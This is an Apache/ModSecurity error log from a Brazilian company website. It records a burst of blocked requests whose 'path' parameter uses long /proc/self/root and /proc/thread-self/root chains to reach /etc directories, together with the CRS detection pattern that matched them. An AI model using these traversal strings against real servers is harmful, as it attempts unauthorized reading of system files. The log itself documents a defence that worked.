[Mon Mar 16 11:29:31.933526 2026] [:error] [pid 32654:tid 140411624429312] [client 74.7.243.203:37018] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTywlT9VtDQc7bgUym_QAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:33.208707 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.243.203:37026] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTzZqj1wV0Si-OkefkAAAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:36.030784 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.243.203:37032] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTzwlT9VtDQc7bgUynAAAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:37.291479 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.243.203:37044] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT0QlT9VtDQc7bgUynAgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:39.647900 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:37058] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT07ysWC90G-1nBrA9BAAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:40.983075 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:50866] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT1Jqj1wV0Si-OkefkBAAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:42.194384 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.243.203:50876] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT1nbQATo66fKoS7xGOAAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:44.415756 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.241.46:55860] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT2HjZBu2q05ozVU9OzgAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:29:45.731137 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.241.46:34926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT2QlT9VtDQc7bgUynBQAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:29:45.904961 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.243.203:50892] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT2QlT9VtDQc7bgUynBgAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:47.177845 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:50900] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT25qj1wV0Si-OkefkBwAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:48.322683 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.243.203:50904] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT3NSswJuvopo3lOhYAgAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:49.635078 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.243.203:50910] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT3bABkC4fWIHEf8HjdwAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:50.911700 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:56378] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT3rysWC90G-1nBrA9BwAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:53.331218 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.243.203:56390] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT4QlT9VtDQc7bgUynCAAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:54.754932 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.243.203:56406] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT4tSswJuvopo3lOhYAwAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:55.919632 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.243.203:56408] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT47ysWC90G-1nBrA9CAAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:57.215818 2026] [:error] [pid 32654:tid 140411624429312] [client 74.7.243.203:56412] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT5QlT9VtDQc7bgUynCQAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:59.551172 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.243.203:56416] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT57ysWC90G-1nBrA9CwAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:00.882582 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.243.203:39420] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT6NSswJuvopo3lOhYBwAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:05.747154 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.243.203:39432] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT7QlT9VtDQc7bgUynDwAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
